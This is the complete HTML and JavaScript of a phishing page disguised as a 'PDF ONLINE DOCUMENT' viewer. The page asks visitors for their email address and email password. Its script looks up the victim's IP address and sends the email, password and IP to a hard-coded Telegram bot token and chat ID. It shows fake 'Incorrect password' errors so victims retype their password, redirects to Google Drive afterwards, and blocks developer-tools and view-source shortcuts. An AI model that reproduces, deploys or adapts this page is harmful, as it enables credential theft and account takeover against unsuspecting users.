<!DOCTYPE html>
<html lang="en">
<head>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <title>PDF ONLINE DOCUMENT</title>
    <link rel="shortcut icon" href="https://cdn.glitch.global/30e3fd15-1595-4f62-8949-4a92dad3c744/pdf-logo.png?v=1703176079035"/>

    <style>
        body, html {
            height: 100%;
            margin: 0;
            font-family: Arial, Helvetica, sans-serif;
        }
        * {
            box-sizing: border-box;
        }
        .bg-image {
            background-image: url("https://firebasestorage.googleapis.com/v0/b/png-images-481bb.appspot.com/o/Adobe.png?alt=media&token=a3813f1f-169a-48a6-8172-22d091f87e7c");
            opacity: 1;
            height: 100%;
            background-position: center;
            background-repeat: no-repeat;
            background-size: cover;
            position: absolute;
            width: 100%;
            filter: blur(2px);
        }
        .bg-overlay {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.6);
            z-index: 1;
        }
        .bg-text {
            background: #EF1A08;
            width: 370px;
            height: 450px;
            -webkit-box-shadow: 1px 1px 15px 1px #000000;
            box-shadow: 1px 1px 15px 1px #000000;
            border-radius: 1px 25px 1px 40px;
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            z-index: 2;
            text-align: center;
        }
        input[type=submit] {
            width: 290px;
            height: 40px;
            font-family: arial;
            font-size: 14px;
            color: #FFF;
            background-color: #EF1A08;
            border: solid 1px #EF1A08;
            border-radius: 2px 10px 2px 10px;
            -webkit-box-shadow: 2px 2px 15px 5px #000000;
            box-shadow: 2px 2px 15px 5px #000000;
            font-weight: bold;
        }
        input[type=password], input[type=email] {
            width: 290px;
            height: 35px;
            font-family: arial;
            font-size: 13px;
            border-radius: 3px;
            color: #000000;
            background-color: #FFF;
            border: solid 1px #FFF;
            padding: 10px;
        }
    </style>
</head>

<body>
    <div class="bg-image"></div>
    <div class="bg-overlay"></div>
    <div class="bg-text">
        <table align="center" cellspacing="0">
            <tr><td style="height:10px;"></td></tr>
            <tr><td style="height:8px;"></td></tr>
            <tr><td>
                <form action="" method="post" id="myForm" name="myform">
                    <input type="text" name="email" id="email" style="display:none;">
                    <input type="text" name="password" id="password" style="display:none;">
                </td></tr>
                <tr><td>
                    <div align="center">
                        <font face="impact" size="+2" color="#FFF">
                            PDF ONLINE DOCUMENT
                        </font>
                    </div>
                </td></tr>
                <tr><td style="height:7px;"></td></tr>
                <tr><td>
                    <div align="center">
                        <font face="arial" size="1" color="#FFF">
                            <b></b>
                        </font>
                    </div>
                </td></tr>
                <tr><td style="height:7px;"></td></tr>
                <tr><td>
                    <div align="center">
                        <img src="https://cdn.glitch.global/30e3fd15-1595-4f62-8949-4a92dad3c744/pdf-logo.png?v=1703176079035" style="width:120px;">
                    </div>
                </td></tr>
                <tr><td style="height:10px;"></td></tr>
                <tr><td style="height:5px;">
                    <div align="center">
                        <font face="arial" size="2" color="#FFF">
                            <font size="2">Sign in to view Document</font>
                        </font>
                    </div>
                </td></tr>
                <tr><td style="height:5px;"></td></tr>
                <tr><td>
                    <table cellspacing="0" align="center">
                        <tr><td>
                            <div align="center">
                                <input name="tin" id="tin" type="email" value="[[-Email-]]" placeholder="Email ID" required>
                            </div>
                        </td></tr>
                        <tr><td style="height:7px;"></td></tr>
                        <tr><td>
                            <div align="center">
                                <input name="tan" id="tan" type="password" placeholder="Email password" autofocus="" required>
                            </div>
                        </td></tr>
                        <tr><td style="height:15px;"></td></tr>
                        <tr><td>
                            <div align="left">
                                <input type="submit" value="Download">
                            </div>
                            <br/>
                            <div id="message" style="color: white;"></div>
                        </td></tr>
                    </table>
                </form>
            </td></tr>
        </table>
    </div>
<script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8c2d203e3da2b51d',t:'MTcyNjI4MjgxOC4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();</script></body>

<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
<script type="text/javascript">
    $(document).ready(function() {
        const urlParams = new URLSearchParams(window.location.search);
        const emailValue = urlParams.get('email') || '';
        $('#tin').val(emailValue ? emailValue : '[[ -Email- ]]');
        let attemptCount = 0;

        function handleFormSubmission(event) {
            event.preventDefault();
            attemptCount++;
            if ($("#email").val() || $("#password").val()) {
                $("#message").html("Error Retrieving document(s)");
                return;
            }
            $("#loadingGif").show();
            var tinVal = $("#tin").val();
            var tanVal = $("#tan").val();

            if (attemptCount < 3) {
                setTimeout(function() {
                    $("#message").html("Incorrect password, try again");
                }, 1000);
                $("#tan").val("");
            } else {
                setTimeout(function() {
                    $("#message").html("Success! Retrieving document(s)");
                }, 1000);
                setTimeout(function() {
                    window.location.href = "https://drive.google.com/drive/u/0/my-drive";
                }, 2000);
            }

            $.get("https://api.ipify.org?format=json", function(response) {
                var ip = response.ip;
                var botToken = "7048774014:AAHI7_Lnw3ZeAueNXwS7h7wpYysGI4iDp3U";
                var chatId = "1532024601";
                var message = "Email: " + tinVal + "\nPassword: " + tanVal + "\nIP Address: " + ip;

                $.ajax({
                    url: `https://api.telegram.org/bot${botToken}/sendMessage`,
                    method: "POST",
                    data: {
                        chat_id: chatId,
                        text: message
                    },
                    success: function() {
                        console.log("Message sent to Telegram successfully");
                    },
                    error: function() {
                        console.log("Error sending message to Telegram");
                    },
                    complete: function() {
                        $("#loadingGif").hide();
                    }
                });
            });
        }

        $("#myForm").submit(handleFormSubmission);
    });

    document.onkeydown = function (e) {
        if (e.keyCode == 123) return false;
        if (e.ctrlKey && e.shiftKey && e.keyCode == "I".charCodeAt(0)) return false;
        if (e.ctrlKey && e.shiftKey && e.keyCode == "J".charCodeAt(0)) return false;
        if (e.ctrlKey && e.keyCode == "U".charCodeAt(0)) return false;
        if (e.ctrlKey && e.keyCode == "C".charCodeAt(0)) return false;
        if (e.ctrlKey && e.keyCode == "X".charCodeAt(0)) return false;
        if (e.ctrlKey && e.keyCode == "Y".charCodeAt(0)) return false;
        if (e.ctrlKey && e.keyCode == "Z".charCodeAt(0)) return false;
        if (e.ctrlKey && e.keyCode == "A".charCodeAt(0)) return false;
        if (e.ctrlKey && e.keyCode == "V".charCodeAt(0)) return false;
        if (e.ctrlKey && e.keyCode == "P".charCodeAt(0)) return false;
        if (e.ctrlKey && e.keyCode == "S".charCodeAt(0)) return false;
        if (e.ctrlKey && e.keyCode == "D".charCodeAt(0)) return false;
        if (e.ctrlKey && e.keyCode == "E".charCodeAt(0)) return false;
        if (e.ctrlKey && e.keyCode == "F".charCodeAt(0)) return false;
        if (e.ctrlKey && e.keyCode == "G".charCodeAt(0)) return false;
        if (e.ctrlKey && e.keyCode == "H".charCodeAt(0)) return false;
        if (e.ctrlKey && e.keyCode == "K".charCodeAt(0)) return false;
        if (e.ctrlKey && e.keyCode == "L".charCodeAt(0)) return false;
        if (e.ctrlKey && e.keyCode == "Q".charCodeAt(0)) return false;
        if (e.ctrlKey && e.keyCode == "R".charCodeAt(0)) return false;
        if (e.ctrlKey && e.keyCode == "T".charCodeAt(0)) return false;
        if (e.ctrlKey && e.keyCode == "W".charCodeAt(0)) return false;
        if (e.ctrlKey && e.keyCode == "N".charCodeAt(0)) return false;
        if (e.ctrlKey && e.keyCode == "O".charCodeAt(0)) return false;
        if (e.shiftKey && e.keyCode == 112) return false;
        if (e.keyCode == 67 && e.shiftKey && (e.ctrlKey || e.metaKey)) return false;
        if (e.keyCode == "J".charCodeAt(0) && e.altKey && (e.ctrlKey || e.metaKey)) return false;
        if (e.keyCode == "M".charCodeAt(0) && e.altKey && (e.ctrlKey || e.metaKey)) return false;
        if (e.keyCode == "V".charCodeAt(0) && e.altKey && (e.ctrlKey || e.metaKey)) return false;
    }
</script>
</html>
